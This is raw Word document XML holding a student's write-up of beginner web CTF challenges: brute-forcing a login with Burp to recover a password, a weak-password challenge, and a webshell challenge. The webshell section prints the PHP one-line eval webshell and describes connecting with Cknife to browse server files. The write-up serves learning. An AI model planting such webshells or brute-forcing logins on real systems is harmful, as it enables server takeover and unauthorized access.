    <w:p w14:paraId="189BA15F" w14:textId="77777777" w:rsidR="00F320C7" w:rsidRP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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE5378" w14:textId="77777777" w:rsidR="00F320C7" w:rsidRDefault="00F320C7" w:rsidP="00F320C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F320C7">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CE3984" w14:textId="0DA3EFEC" w:rsidR="005162FF" w:rsidRDefault="00F320C7" w:rsidP="00F320C7">
      <w:r w:rsidRPr="00F320C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，推测网页根据返回包中对r的赋值语句对下一步动作进行判断，即当对r的赋值不为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F320C7">
        <w:t>“{code: 'bugku10000'}”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，网页会跳转至</w:t>
      </w:r>
      <w:r w:rsidR="005162FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r w:rsidR="005162FF" w:rsidRPr="005162FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="005162FF" w:rsidRPr="005162FF">
        <w:t>success.php?code='+r.code</w:t>
      </w:r>
      <w:r w:rsidR="005162FF" w:rsidRPr="005162FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="005162FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（r</w:t>
      </w:r>
      <w:r w:rsidR="005162FF">
        <w:t>,code</w:t>
      </w:r>
      <w:r w:rsidR="005162FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在密码正确时的值未知，故无法直接进行手动跳转），接下来对返回包的内容进行筛选，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6537E794" w14:textId="7B8B8DFB" w:rsidR="005162FF" w:rsidRDefault="005162FF" w:rsidP="00F320C7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对含有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F320C7">
        <w:t>“{code: 'bugku10000'}”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据包进行标记，再重复上面的爆破，并升序排列此标记栏，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>发现不含</w:t>
      </w:r>
      <w:r w:rsidRPr="00F320C7">
        <w:t>“{code: 'bugku10000'}”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句的返回包，查看发出的包，得到密码“</w:t>
      </w:r>
      <w:r w:rsidRPr="005162FF">
        <w:t>zxc123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。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7D93F49" wp14:editId="3A9B373F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4313</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>94891</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2691442" cy="2186798"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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218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EB2A" w14:textId="1EDA6EFB" w:rsidR="005162FF" w:rsidRDefault="005162FF" w:rsidP="00F320C7"/>
    <w:p w14:paraId="3CE061DC" w14:textId="07170420" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="1905F2E1" w14:textId="14435E82" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="778D609D" w14:textId="05C05A81" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="3F5CB6E5" w14:textId="62E13339" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="74770F36" w14:textId="168F6DFA" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="177ABDE7" w14:textId="5AD41597" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="154D376C" w14:textId="4E53DD7C" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="0264C12E" w14:textId="6E53C119" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="1E23CF8D" w14:textId="5EDE1B2E" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="09C58E14" w14:textId="77777777" w:rsidR="004B5F95" w:rsidRPr="005162FF" w:rsidRDefault="004B5F95" w:rsidP="00F320C7"/>
    <w:p w14:paraId="019F9908" w14:textId="764E28DE" w:rsidR="00DA69A6" w:rsidRPr="00F320C7" w:rsidRDefault="00DA69A6" w:rsidP="00F320C7"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攻防世界web入门区——weak auth。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59826ED0" w14:textId="77777777" w:rsidR="004B5F95" w:rsidRDefault="004B5F95" w:rsidP="00414F46">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据题目提示，本题为弱密码爆破。先任意尝试用户名和密码，提示用户名为“admin”，再用bp进行弱密码尝试，观察返回包字长，发现不同数据包，得到密码，登入得到flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113C9584" w14:textId="691EB13D" w:rsidR="00DA69A6" w:rsidRDefault="00DA69A6" w:rsidP="00414F46">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w: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攻防世界web入门区——webshell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41AF5C" w14:textId="77777777" w:rsidR="009A314B" w:rsidRDefault="009A314B" w:rsidP="009A314B">
      <w:r w:rsidRPr="009A314B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3B95C5" w14:textId="1D459F51" w:rsidR="009A314B" w:rsidRPr="009A314B" w:rsidRDefault="009A314B" w:rsidP="009A314B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009A314B">
        <w:t>你会使用webshell吗？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD1017" w14:textId="2B782CB5" w:rsidR="00DA69A6" w:rsidRDefault="009A314B" w:rsidP="009A314B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009A314B">
        <w:t>&lt;?php @eval($_POST['shell']);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAED6F9" w14:textId="63B68D06" w:rsidR="009A314B" w:rsidRDefault="009A314B" w:rsidP="009A314B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查阅资料知晓，此为webshell中的一句话木马，基本原理是服务器中存在一个名为“shell”的变量，我们可以通过post方式向之传递参数，当传入PHP语句时，</w:t>
      </w:r>
      <w:r w:rsidRPr="009A314B">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009A314B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;?php @eval($_POST['shell']);?&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009A314B">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句会将其视为合法语句并执行命令，以此操控服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C57E256" w14:textId="4DEB85ED" w:rsidR="009A314B" w:rsidRPr="009A314B" w:rsidRDefault="000607A3" w:rsidP="009A314B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该方法可使用C</w:t>
      </w:r>
      <w:r>
        <w:t>knife</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件快速执行命令，一番搜索后下载Cknife，添加shell，输入网址和一句话木马中的变量名，便可直接访问服务器内所有文件，在其中找到flag文件即可。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009A314B" w:rsidRPr="009A31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E1AE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B64FE2E"/>
    <w:lvl w:ilvl="0" w:tplc="7AEA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0270CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7AA47B8E"/>
    <w:lvl w:ilvl="0" w:tplc="E076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45"/>
    <w:rsid w:val="000607A3"/>
    <w:rsid w:val="000C0EFE"/>
    <w:rsid w:val="001873B3"/>
    <w:rsid w:val="0023425D"/>
    <w:rsid w:val="00382180"/>
    <w:rsid w:val="00414F46"/>
    <w:rsid w:val="004B5F95"/>
    <w:rsid w:val="004F6A95"/>
    <w:rsid w:val="005162FF"/>
    <w:rsid w:val="00530DF6"/>
    <w:rsid w:val="00582049"/>
    <w:rsid w:val="005A011A"/>
    <w:rsid w:val="00722F00"/>
    <w:rsid w:val="00894845"/>
    <w:rsid w:val="008F758C"/>
    <w:rsid w:val="009A314B"/>
    <w:rsid w:val="009D1A11"/>
    <w:rsid w:val="00A64F72"/>
    <w:rsid w:val="00A87A2B"/>
    <w:rsid w:val="00B2155C"/>
    <w:rsid w:val="00BF26F6"/>
    <w:rsid w:val="00CD6034"/>
    <w:rsid w:val="00D07C70"/>
    <w:rsid w:val="00D734DC"/>
    <w:rsid w:val="00DA69A6"/>
    <w:rsid w:val="00DB58A0"/>
    <w:rsid w:val="00F320C7"/>
    <w:rsid w:val="00FD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BB54"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5171E696-CFE2-4A66-B71A-F921C062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EFE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FD76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76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2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20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764F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FD764F"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00FD76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FD764F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FD76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D76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D76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D764F"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="00FD764F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FD764F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005820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820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Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00B2155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B2155C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B21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2155C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2155C"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af0">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00DA69A6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="html-tag">
    <w:name w:val="html-tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005A011A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="html-attribute-name">
    <w:name w:val="html-attribute-name"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005A011A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="html-attribute-value">
    <w:name w:val="html-attribute-value"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005A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9224-CAAD-4D76-9E93-EC140D53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 I</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>cd I</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-29T05:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-31T04:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>